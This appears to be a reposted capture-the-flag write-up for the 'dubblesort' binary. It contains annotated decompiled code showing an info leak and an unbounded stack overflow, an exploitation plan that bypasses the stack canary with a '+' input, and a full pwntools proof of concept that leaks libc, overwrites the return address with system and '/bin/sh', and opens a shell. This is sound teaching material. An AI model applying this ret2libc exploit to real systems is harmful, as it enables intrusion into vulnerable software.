Analysis of TW.Du****sort

Analysis of TW.Du****sort

0x00 逆向分析

// IDA pseudocode of the challenge binary's main(). Decompiler quirks to keep
// in mind while reading: the variadic arguments of __printf_chk are not shown,
// and `*(&number_store + v6)` is int-pointer arithmetic (4-byte steps).
// The two weaknesses the rest of the write-up builds on are marked below.
int __cdecl main(int argc, const char **argv, const char **envp)
{
  int number; // eax
  int *v4; // edi -- write cursor into the number array
  unsigned int v5; // esi -- input loop counter
  unsigned int v6; // esi -- output loop counter
  int v7; // ST08_4
  int result; // eax
  unsigned int numbers; // [esp+18h] [ebp-74h] -- user-supplied count, never bounded
  int number_store; // [esp+1Ch] [ebp-70h] -- first element of the in-place number array
  char buf; // [esp+3Ch] [ebp-50h] -- 0x40 bytes, ending right at the canary copy
  unsigned int v12; // [esp+7Ch] [ebp-10h] -- stack-protector canary copy

  v12 = __readgsdword(0x14u); // save the canary (gs:0x14); it is re-checked before return
  cha_start();
  __printf_chk(1, (int)"What your name :");
  // Weakness 1 (info leak): read() neither NUL-terminates nor does buf get
  // zeroed, so the %s below keeps printing stack bytes after the name until
  // it meets a NUL. Fix: read at most sizeof buf - 1 bytes and terminate buf
  // at the count read() returns.
  read(0, &buf, 0x40u);
  __printf_chk(1, (int)"Hello %s,How many numbers do you what to sort :"); // buf is the %s argument (argument dropped by the decompiler)
  __isoc99_scanf("%u", &numbers); // neither the return value nor the range of `numbers` is checked
  number = numbers;
  if ( numbers )
  {
    v4 = &number_store;
    v5 = 0;
    do
    {
      __printf_chk(1, (int)"Enter the %d number : ");
      fflush(stdout);
      // Weakness 2 (stack overflow): `numbers` dwords are written from
      // ebp-70h upward with no capacity check. Only 8 dwords fit before buf
      // (0x70 - 0x50 = 0x20 bytes); past that the writes cover buf, the
      // canary copy at ebp-10h, the saved registers and the return address.
      // A %u conversion that fails (e.g. the input "+", see 0x01) stores
      // nothing, so that slot keeps its old value. Fix: reject any count
      // larger than the array's capacity before this loop.
      __isoc99_scanf("%u", v4);
      ++v5;
      number = numbers;
      ++v4;
    }
    while ( numbers > v5 );
  }
  sort((unsigned int *)&number_store, number); // sorts the same unbounded range, overflowed data included
  puts("Result :");
  if ( numbers )
  {
    v6 = 0;
    do
    {
      v7 = *(&number_store + v6); // element v6 (int-pointer arithmetic)
      __printf_chk(1, (int)"%u "); // v7 is the %u argument (dropped by the decompiler)
      ++v6;
    }
    while ( numbers > v6 );
  }
  result = 0;
  if ( __readgsdword(0x14u) != v12 )
    sub_BA0(); // presumably __stack_chk_fail; only fires if the copy at ebp-10h was changed
  return result;
}

需要关注的是main函数栈:


中间有4个pop别忘了:


0x01 漏洞利用

  1. %s漏洞进行libc leak
  2. rewrite栈数据返回system

   warning!!!

  1. %u对于“+”不采取写入操作,因此可以绕过金丝雀
  2. 本机实验的libc和靶机有别,要用peda读取sys和sh的地址偏移

0x02 poc

from pwn import*

context.log_level = 'debug'  # pwntools: dump every byte exchanged, handy when a prompt string below does not match

client=process("/home/pwn2plumer/Desktop/dubblesort")  # local copy of the challenge binary (author's path; see warning 2 on libc differences)

#gdb.attach(client)

def send(context):
	"""Wait for the "number :" prompt and answer it with one line.

	`context` here is the text to send; inside this function the name
	shadows pwntools' global `context` object (harmless, but easy to misread).
	"""
	client.recvuntil("number :")
	client.sendline(context)

def libc_leak():
	"""Return the libc base recovered from the binary's name echo.

	The binary read()s the name into an uninitialised, unterminated stack
	buffer and prints it back with %s, so the bytes printed after the name
	are presumably stack residue. The constants subtracted below are offsets
	for the author's libc (see warning 2) and are not portable.
	"""
	client.recvuntil("What your name :")
	client.sendline("aaaaaaaaaaaaaaaaaaaaaaaa")  # 24 bytes plus newline, well under the 0x40-byte read
	client.recvuntil("Hello aaaaaaaaaaaaaaaaaaaaaaaa")
	__libc=u32(client.recv(4))  # next 4 leaked bytes as a dword (little-endian, pwntools default)
	print hex(__libc)  # Python 2 print statement
	__libc_base=__libc-0xa-0x1b2000  # libc-specific adjustment for the author's libc
	return __libc_base

__libc_base=libc_leak()
client.sendline("35")  # the count for the number loop; the binary never bounds it against the array (see 0x01)


# 8 dwords: the room between number_store (ebp-70h) and buf (ebp-50h)
for i in range(8):
	send("1")

# 16 dwords: the 0x40-byte buf
for i in range(16):	
	send("2")

# a failed %u conversion stores nothing, so the canary slot keeps its value (warning 1)
send("+")

# offsets for the author's libc (warning 2); must be re-measured for another libc
system_addr=__libc_base+0x3ada0

string_addr=__libc_base+0x15ba10

# the saved registers ("4 pops" above) and the return address region
for i in range(8):
	send(str(system_addr))


# two copies of the string pointer following the system addresses
send(str(string_addr))

send(str(string_addr))

pause()  # wait for a keypress, e.g. to attach a debugger before continuing

client.interactive()

GET!!!


转载自blog.csdn.net/qq_40265677/article/details/80032673